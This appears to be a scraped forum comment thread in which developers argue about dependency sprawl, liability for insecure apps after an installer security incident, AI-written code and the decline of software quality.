You want few dependencies, you want them to be widely used and you want them to be stable. Pulling in a tree of modules to check if something is odd or even isn't a good idea.
What?! It's not some kind of joke. This could _already_ literally kill people, stole money and ruin lives.
It isn't even an option to avoid taking reaponsibility for the decisions which lead to security and safety of users for any app owner/author.
It's as simple as this: no safety record to 3rd party - no trust, for sure. No security audit - no trust. No transparency in the audit - no trust.
Failing to make the right decision does not exempt from the liability, and should not.
Is it a kindergarden with "it's not me, it's them" play? It does not matter who failed, the money could has been be stolen already from the random ones (who just installed an app wrapped with this todesktop installer), and journalists could have been tracked and probably already killed in some dictatorship or conflict.
Bad decisions does not always make the bad owner.
But don't take it lightly, and don't advocate (for those who just paid you some money) "oh, they are innocent". As they are not. Be a grown-up, please, and let's make this world better together.
They can even charge for it ;)
Solution: more LLMs
Snap out of it
https://docs.github.com/en/code-security/code-scanning/intro...
These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching the error on stackoverflow.
Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.
When they make their business model or employability advantage to take free code in the internet, add pumpkin spice and charge cash for it, they cross the line from pissing passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.
It is not sufficient to write somewhere in a contract that something is as is and we hold harmless and this and that. Buddy if you download an ai tool to write an ai tool to write an ai tool and you decided to slap a password in there, you are playing with big guns, if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.
That's worse than a vulnerability, there is no shared responsibility, at least with a vuln, you can argue that it wasn't all your fault, someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming ai with ai is vulns? No! We have a certainty, not a risk, that they will fuck it up.
Eventually we should license the field, but for now, we gotta hold devs liable.
Give those of us who do 10 times less, but do it right, some kind of marketing advantages, it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?
My brothers lets take arms and defend. And defend quality software I say. Fear not writing code, fear not writing raw html, fear not, for they don't feel fear so why should you?
"Quality over quantity" should be the way, but I think it has failed in every single sector. Food. Healthcare. Education. Manufacturing. Construction. ...
Quality is expensive.